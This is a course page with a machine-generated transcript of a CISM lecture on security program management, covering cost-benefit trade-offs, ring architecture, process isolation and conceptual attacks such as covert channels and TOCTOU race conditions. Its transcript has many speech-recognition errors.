Time
2 hours 5 minutes
Difficulty
Advanced
CEU/CPE
5

Video Description

This lesson offers an overview of information security program management and talks about what will be covered over the entire module: - Security architecture - Security models - Evaluation criteria - Certification and accreditation - Technical project management - Cost benefit analysis - Trusted computing/protected access - Vulnerabilities

Video Transcription

00:04
all right. Moving on with our third chapter. Ah, force. I bury Certified information Security Manager. Our third chapter is on information security program management. So everything from Thea design and the architecture of a system through its creation
00:23
Ah, the models on which we build thes systems, how we evaluate the systems and how we determinate determined that they're ultimately to be certified and accredited.
00:32
Ah, as well as how we manage this project from beginning to end with security in mind. So a lot of good information in this chapter now the first thing I just want to review again very quickly cost benefit analysis Now in the risk management chapter, we talked about that right? We talked about the idea that
00:50
you don't want to spend more money to secure a system
00:53
than the value of what's being protected. Right? And we talk about, you know, we start off by identifying the value of our asset. We look att, threats, we look at vulnerabilities and then we try to find a cost effective solution. And I just wanted to reiterate that
01:07
because you have to have an honest understanding of cost benefit analysis before you start in your design.
01:14
If you'll remember the question, I asked him the last module, how much security is enough?
01:19
And even though so many people are tempted to say you could never have enough security, you can. The amount of security that we're gonna enforce is just enough. And what I mean by that is we're going to make absolutely certain that we protect our assets to the degree that is warranted.
01:36
We're not going to spend any more money than we have to in doing so, though
01:40
the whole purpose of security is to support our organization. And if we spend too much on security, we're not supporting our company for the same reason that I don't have a security guard in front of my house and a retina scan to get into my
01:53
kitchen or whatever that might be. We find the balance and we provide the amount of security that's enough,
02:00
right? We don't want too much security. Why? Well, because it costs money, but
02:06
the other costs associate with security or maybe less tangible. But they're every bit as important to understand performance. You will almost always decreased performance. When you add security, it takes longer.
02:21
You know every now and then if I just run out to my car to grab something, I don't want my house door to go out to my car. Why?
02:27
Because it takes too long to lock in tow. Unlock for the 10 seconds I'm gonna be outside. Right? Security slows you down.
02:36
Is it worth it? Yeah, up until the degree where it's no longer worth it, if you know what I mean. So the idea is, we expect that performance will suffer and we find that balance between their needs for performance
02:50
and our need for security. There's always a mix which we don't really go into. A lot of discussion here on separation of duties, not in this chapter. But separation of duties is so important because every role in the organization has its own purposes. One of the biggest problems I see in a lot of organizations
03:07
is they don't separate the role of network administrator
03:10
from security administrator
03:13
because they don't want to spend the money to hire two people with similar skill sets. And I say, Why not work? I knows how to secure the network. Yes, but your network person, their top priority is availability and performance. You know, I did many years as a network administrator. I knew I was doing my job when the phone wasn't ringing. He was quiet.
03:32
Everybody had what they needed the half. But as a security administrator, that's the opposite of what my goals are. As a security administrator, I want to make things secure. I wanna lock him down. I don't want everything to be quick and easy to get to. So when we think about a network idea administrator whose primary goal
03:53
his performance
03:53
versus a security administrator being focused on security, those air cross purposes. So when we do this cost benefit analysis, we have to realize we will sacrifice performance. It's just the way that it is with security, but we need to make sure we're making a good decision on how much performance will we sacrifice
04:13
because at some point in time is people can't do the work that they need to do. That's obviously not acceptable.
04:17
So the point I want to make is you've got to do an honest you gotta have an honest discussion about what sort of degradation of performance is acceptable, and you've gotta have that discussion with somebody other than the person whose job rests on high performance, if you know what I mean. So
04:34
another cost performance. You will almost always lose some performance
04:40
to security. Security slows things down.
04:43
Okay, Ease of use. It is much easier to access things in a non secure network. If you've ever gone to a friend's house and wanted to get on their WiFi network, For instance, you have that friend who has the 35
04:57
ah character WiFi password with upper lower case alphanumeric, non ALF numeric, all kinds of stuff
05:03
that's very difficult.
05:05
It's hard to use. Can't you just have your WiFi password called Password? Make it easy, right? People like ease of use. They like things toe work right out of the box. That's another cost for security, right? So when you're designing a system,
05:20
you have to understand that there will be some tradeoffs depending on the value of what you're protecting.
05:27
You may in some cases say well, this is not the most secure option, but we're doing it for ease of use, you know, passwords as a whole. It's much more secure to have smart cards or biometrics or any of numerous other, more secure methods than passwords. But why do we use passwords? Because they're easy because they're cheap.
05:45
And let me tell you somebody that's been a 90 for a long time,
05:47
a multitude of decisions Come on. Those two words we likes cheap and we likes easy. And when we get him together, a lot of decisions get made. So even in design, these are things you have to understand in order to meet the requirements of the product.
06:03
All right, backwards compatibility. Often as we move forward, we get stronger technology, better technology, faster technology, more secure technology that's not always backwards, compatible with older systems and older service is. So if we do need this toe work in an older environment,
06:20
sometimes we have to back off on security in order to exist,
06:25
and that happens in many instances. So a lot of times when we configure a system,
06:30
we usually configure it to work in, you know, a couple of different modes where its primary or preferred mode is more secure. But then, in certain situations where that more secure setting is not available, maybe it can back down to a less secure setting. You know, it really just depends. But we have to understand again as part of system design and architecture.
06:49
What our goals are.
06:50
User acceptance Users don't liketo have to jump through a lot of hoops. You know, users already have a ton of passwords to keep up with. If you think that all the websites users go to all the different passwords, they have to be aware of cat cards. That's one more thing I have to carry and not lose and keep up with and put it in the reader. Remember to take it out of the reader.
07:11
I know all this sounds very silly,
07:13
but we do have to consider how much responsibility we're gonna continue to place on end users because it's cumbersome for them. So as I t professionals, we want to implement security. But we also wanted this easy on the user's as possible. Once users start to resent the security features we implement,
07:30
then their next step is start figuring out a way to bypass them.
07:33
Our goal is to keep our users happy when it all possible. Okay, so these air discussions that we have to have before the design of the system before we begin the concepts and the architecture and figure out the goals and how we're gonna implement them, because it's an important consideration. How much security is enough,
07:53
just enough so that we can provide the other service is a swell.
07:57
All right now when we start talking about security architecture and this doesn't get really in depth, this is just very appropriate for managers. But we do have to understand some of the ways that we implement security into the design of certain elements.
08:11
And we'll talk a little bit about the idea of trusted computing, layering in isolation
08:16
and then boundaries and enforcing thes boundaries. So when we design a system, what we want to understand from the start is there elements that we consider to be very secure, their elements that we consider to be sort of secure and elements we consider to be not secure it all. Or at least that's how things have traditionally been designed.
08:37
Ah good example of this is to talk a little bit about a concept called ringed
08:41
architecture, and most operating systems are designed on a ringed architecture, and this is purely conceptual. In the ideas, thes rings indicate different layers of trust. Originally, Windows was designed upon a four ring architecture,
08:56
and so, ultimately, another way to think about that was four layers of trust within the operating system.
09:03
So the elements that were considered to be part of ring zero, so to speak, are in this little centre ring, you know, visually, and this is called the trusted computer base. The T C B
09:16
would fall in ring zero, and that's a term that comes to us from, AH, book called The Orange Book. The Trusted Computer Security evaluation, our system evaluation criteria.
09:28
That's a book that the government used to use as a means of evaluating systems based on their security implementations. So the T C B, the trusted computer base, these air those elements most tightly, most highly trusted.
09:43
You know, if you think about it,
09:46
there's some things in your system that have to be beyond reproach, and there are other things that we know just aren't trustworthy at all.
09:52
Okay, so, for instance, I don't care how secure your operating system is. I don't care how secure your memory is, how secured this? That or the other. If your system bios isn't secure,
10:05
and I'm able to corrupt that bios and calls your system to boot to a not another location. For instance, none of that other stuff matters, so your system bios must be highly, highly trustworthy.
10:18
Your processor. If your processor isn't trustworthy,
10:22
you don't have a trustworthy system. No matter what you do,
10:24
your ram your memory that's not trustworthy. You're dead in the water here. All of those elements that have the highest trust are considered to be part of the trusted computer base and architectural. It's architecturally speaking there in ring zero. Okay,
10:41
these are the most protected protected elements.
10:46
Now there are things that we don't trust quite as much like maybe file system drivers. I know this says device drivers. I would really think more like file system drivers like drivers for the NT F s filing system. If your Windows person still part of the operating system.
11:03
Ah, the memory manager. So still, you know, fairly trusted elements, but not
11:07
as trusted. It's the TCBY. So their ring one Abbott ring, too. We become a little less trusted again, so very trusted, a little less trusted, little less trusted, not trusted adult at ring to you've seen things like device drivers that provide the interface between your hardware in your operating system and then added Ring three,
11:28
our applications. Now, applications are not trustworthy at all. I don't know who wrote this application.
11:33
I don't know how they tested it. I don't know how it addresses memory issues and so on. So out here, these items that we don't trust at all. So this was how the original Windows operating system was designed. Four different layers of trust.
11:48
So the principle behind this layering is you also get isolation. You have this little conceptual boundary between ring zero and ring one than another boundary between one and two. And the idea is less trusted. Items cannot directly access more trusted items.
12:05
Okay, less trusted, can't access more trusted
12:09
unless it's given an interface
12:13
to travel through.
12:15
And that's a principle. We're gonna talk about a lot in this chapter. The idea of protected access, you know, think about if you work at a bank, your brand new, you've just been hired as a bank teller. Somebody gives you $10,000 to deposit
12:28
as a bank teller who's been there two weeks. Do you have keys to put that money in the vault?
12:33
No, hopefully not. But the money needs to go in the vault and you've got the money. So what do you do? You hand off the money to the bank manager who's a trusted intermediary or a trusted interface, and he accesses the vault. Okay, so I don't let an application directly access memory
12:52
unless it goes through what we call a trusted interface.
12:56
And you may have heard the term a P I application programming interface. That's what those do application programming interfaces allow your outer layer applications to have secured access to inner layer items. Hopefully, that makes sense.
13:15
But this whole idea of you don't allow untrusted
13:16
the access your precious resource is. They must go through an interface. And that comes to us from a security model called Clark Wilson. And we'll talk about the Clark Wilson security model in more depth than just a bit.
13:30
Okay, so this idea of boundaries and layering and isolation operating systems are built on these cons in these concepts to separate out, trusted from untrusted. Now, windows functions on simply a two ring model. You're either trusted where your untrusted
13:48
you know, Let's forget these little subtle layers of trust. You're either fully trusted or you're not trusted at all.
13:54
And so really, that allows anything from here, here and here to really have to go through
14:01
to really have to be secured in their function and in their methods to access in a ring items that really is a better measure. It's interesting. But early on, before they decided on the four ring the architecture, the Windows Architects originally wanted to have a 64 rings architecture,
14:18
which I think is kind of interesting. It shows you a little bit into the
14:20
the mindset of software developers. Let's have 64 different layers of trust, and ultimately they settled on four. Now they've even similar simplified that even more with two layers. Okay, so this idea of isolation and protection, it happens not just with the ring, the architecture of the operating system,
14:39
but also for processes
14:41
as well.
14:43
You know, if if if you look at
14:46
just to give you a couple of definitions real quick, they're not on the sides, but just just to give you this idea. So I go out and I buy an application. I go out and buy Microsoft Word, for instance. Okay, that's a program. So a program in an application, those air synonymous.
15:01
If I open Microsoft Word now it gets loaded into memory. It becomes a process
15:05
A and then every individual instruction within word is a threat, you know. So like printing or changing orientation, those air, each threat. So programs just an application. You open that program up, and now it's running in memory. It's a process and individual instructions or threads those air. Just couple of definitions I would
15:26
I would want you to have.
15:26
But every process needs its own set of resource is, and really processes are a lot like Children. You know, if you've ever had to baby sit two kids or if you have two or more kids at home. I actually took my niece and my nephew out swimming a few weeks back,
15:43
and so they're standing on opposite ends of the pool doing totally different things, both of them screaming,
15:48
Look at me, Look at me. Look at me.
15:50
That's how processes are processes. Wanna pretend they're the only process on your system. They don't want some other process stealing their wine light stealing their resource is stealing their glory. So if we're gonna allow these two processes to exist at the same time, we have to find a way of isolating them.
16:10
We're almost tricking processes into thinking they're the only ones
16:14
on the system.
16:15
So we do that by isolating and giving them each their own stack of memory
16:21
might hear. Call the stack or ah ah, you know, a set of memory. Each one has their own buffer of memory, if you will. They have their own time with the processor. They have their own time with configuration files again, kind of like kids.
16:36
Each of the Children want their own space. They want their own resource is they want their own toys. They want their own attention.
16:41
So that's another element of isolation that has to be built into a systems. Design is a means for the operating system to allow multiple processes to run, but you still allow them to run independently so they don't interfere with each other. So those concepts you can get a lot more in depth with those ideas. But again, we're gonna keep this at the management level.
17:00
All right, so
17:02
vulnerabilities when you have these systems, there are many different types of vulnerabilities that are actually attacks or allow for attacks on the actual architecture itself. One of the most common attacks that really exploits the system's architecture is an attack called the Covert Channel.
17:21
Now covert channels exactly what it sounds like. Hidden Channel. It's a hidden path for communication. A. Really. It's a means of communicating, communicating between processes across a path sometimes or in a manner that wasn't intended.
17:37
Now the two types there's a storage, a covert storage channel in a covert
17:41
timing channel.
17:42
Covert storage channel is about where the data is placed, where it's stored. So, for instance, there was an attack a while back, called the Loki Attack. L Okay, I like Ford's brother In the movies. The Loki attack
17:56
used an ICMP header space the space in ICMP header to store and transmit data. That's not where Data goes. It doesn't go behind an icy and P header. There's a specific part of a packet that's designated for the data information the payload.
18:14
So because data was stored somewhere that wasn't designed for the storage of that data,
18:18
that was a covert storage channel.
18:22
Now a covert timing channels even more sophisticated because what that does is one process communicates to another process through the modulation of system. Resource is a through modulating resource is. So what that means is one processor might spike processor you. One process
18:40
might spike processor utilization
18:42
up to 100%
18:45
then drop it down, then spike up, down, up, down, up, down according to a certain predefined pattern.
18:51
So it's using the processor almost like Morse code, to communicate with another process. That's a high end. That's a pretty sophisticated attack, but that's called covert timing Channel.
19:00
Um, other types of attacks on system architecture er, maintenance hooks thes. Don't start out as being an attack. Ah, lot of times a developer programmer will leave a little maintenance hook, which is a quick way so that they don't have to go through all the processes of authentication just a quick way that they can jump in the code to make a change.
19:19
But if you leave that maintenance hook in there and it's still available, someone can exploit that.
19:26
Okay,
19:26
now race conditions,
19:30
race conditions, as in it's a race to the finish line. Our attacks on the timing of a system,
19:37
and there are lots of different types of race attacks. You know, if you just look at at just how a system should work generally,
19:44
I should identify to that system with my user name.
19:48
I will authenticate using a password.
19:51
Once I've authenticated my passwords. Been verified. Now I'm authorized to perform certain activities and actions, right? So identify, authenticate, authorize.
20:03
But if I can break the architecture of a system and caused the authentication process to slow way down
20:11
and speed up authorization
20:14
that I might be able to get authorized based on the user name rather than knowing a password that's a race condition. Anything that works on the timing of system events is a race condition.
20:26
There's another type of a race condition, a specific one called a tac cow, and that stands for time of check, time of use, time of check, in time, a fuse. So what happens with time of check time of use attacks
20:41
give you an example? Let's say that I have 5 $20 bills,
20:48
okay? And you have a $100 bill,
20:52
man, I'm tired of carrying around all these twenties If I give you five twenties? Will you give me $100 bill and you say yes. So I make a big production. 2040 60 8100. And I count that money out and I put it on the desk.
21:07
You turn around to get the $100 bill out of your back, and when you do that, I grabbed one of your twenties and tuck it back in my pocket.
21:14
By the time you give me the $100 bill and take what's on the table and put it in your pocket, I've created the variance I've created the variance between when you verified the money was there and then when you turn back around were actually able to use the money. So there's a difference between when you check and when you use
21:32
well. In this example, the way to create you keep that problem from happening is a soon as I put down, 2040 60 80 100. You grab that money and stick it in your pocket, right?
21:41
So that's true with with software's where Well, this might happen when a process of verifies that a configuration file is accurate and it is complete
21:53
if it doesn't immediately use that configuration file. But if it checks it and goes and does something else and then comes back half an hour later to use it, there's a big amount of time in which a variance could be created. So the moral of the story with Talk Tao attacks is don't allow elapse between when it's checked and when it's used.
22:12
This is system architecture design that keeps this from happening,
22:17
so you, as an end user you as a manager. This isn't a configuration setting, but it's It's so essential that our architects understand these types of attacks and these types of conditions, because we need to make sure that we eliminate as much as possible any of those lapses that would allow an attacker
22:36
thio have an advantage, or to have an opportunity to create an exploit.
22:40
The rest of what's on this slide just another idea about secure architecture. A system should be designed to fail in such a way that it's resource is our secure. In a little while, we're gonna talk about security models and security models are concepts on which we build the system or design a system
23:00
and there's a security model called the Secure State model,
23:04
Um, and ultimately, what this model says is if a system starts securely
23:11
and if a system runs securely
23:15
and if a system fails or shuts down securely than it's secure
23:21
Now, I know that kind of sounds like a no brainer, and in some ways it is. But what's so important to understand about that is unless a system is secure in all of those states, then it's not secure at all.
23:33
So again, I don't care how secure your operating system is and all the security mechanisms and features you have. If I can compromise your bios and force you to start un securely, then you're not a secure system,
23:48
right? Or if I can create a failure so that your system fails in such an unexpected way that it leaves all the doors open, so to speak, then it's not a secure system.
23:59
So, according to the Secure State model, um, we need to make sure that we implement design strategies to secure during startup and start up is actually the hardest time to secure system because all the security mechanisms haven't been loaded yet.
24:15
So how are you gonna load to secure, Uh, how are you gonna secure system where the security mechanisms haven't been loaded? What do you do?
24:21
Right, And then we have to function securely, and then we have to shut down securely. So here, when we do talk about shutting down securely, what we mean is that the system is able to fail even unexpectedly
24:33
in such a manner that all of its processes air closed so that no further breach can happen. And that is actually called maintenance mode. Maintenance mode is when the system fails in such a way that the systems air unable the processes air not able to be further accessed.
24:52
No further compromise can happen. And that's the goal.
24:55
Ah, we refer to that as being fail. Secure. Now fail secure is very different in this concept than fail. Secure would be in physical security. Okay, you might also hear this called fail safe here. Don't confuse, they'll say, for fail, secure
25:10
for a system with failsafe for fail, secure like with automatic door locks, something like that. It's totally different.
25:15
So when we say fail, safe or fail secure, we mean that the system fails into maintenance mode, so no further breach can happen

Up Next

Enterprise Security Architecture

A framework for applying a comprehensive method of describing the current and future structure for an organization?s security processes so that they align with the company?s overall strategic direction

Instructed By

Instructor Profile Image
Kelly Handerhan
Senior Instructor